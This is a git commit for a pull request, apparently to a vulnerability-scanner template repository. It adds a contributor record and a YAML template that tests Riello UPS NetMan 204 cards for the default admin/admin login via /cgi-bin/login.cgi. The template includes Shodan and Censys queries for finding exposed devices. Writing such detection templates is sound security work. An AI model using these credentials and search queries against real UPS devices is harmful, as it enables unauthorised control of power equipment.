Merge pull request #7390 from mabdullah22/netman

Add Netman Default Login
2023-06-14 12:56:14 +05:30 · 2023-06-14 12:56:14 +05:30 · 2613eed41d
parent 7b5839ef64 4b3c6b40a3
commit 2613eed41d
2 changed files with 52 additions and 0 deletions
--- a/contributors.json
+++ b/contributors.json
@ -1378,6 +1378,16 @@
            "website": "https://the-empire.systems",
            "email": ""
        }
+    },
+    {
+        "author": "mabdullah22",
+        "links": {
+            "github": "https://www.github.com/maabdullah22",
+            "twitter": "https://twitter.com/0x416264",
+            "linkedin": "",
+            "website": "",
+            "email": ""
+        }
    }

 ]
--- a/http/default-logins/riello/netman-default-login.yaml
+++ b/http/default-logins/riello/netman-default-login.yaml
@ -0,0 +1,42 @@
+id: netman-default-login
+
+info:
+  name: Riello UPS NetMan 204 Network Card - Default Login
+  author: mabdullah22
+  severity: high
+  description: |
+    Default logins on Riello UPS NetMan 204 is used. Attacker can access to UPS and attacker can manipulate the UPS settings to disrupt the onsite systems.
+  reference:
+    - https://www.riello-ups.com/
+  metadata:
+    verified: "true"
+    shodan-query: title:"Netman"
+    censys-query: services.http.response.body:"Netman204"
+    max-request: 1
+  tags: default-login,netman
+
+requests:
+  - raw:
+      - |
+        GET /cgi-bin/login.cgi?username={{username}}&password={{password}} HTTP/1.1
+        Host: {{Hostname}}
+
+    attack: pitchfork
+    payloads:
+      username:
+        - admin
+      password:
+        - admin
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"response": "ok",'
+          - '"message": "Welcome."'
+        condition: and
+
+      - type: status
+        status:
+          - 200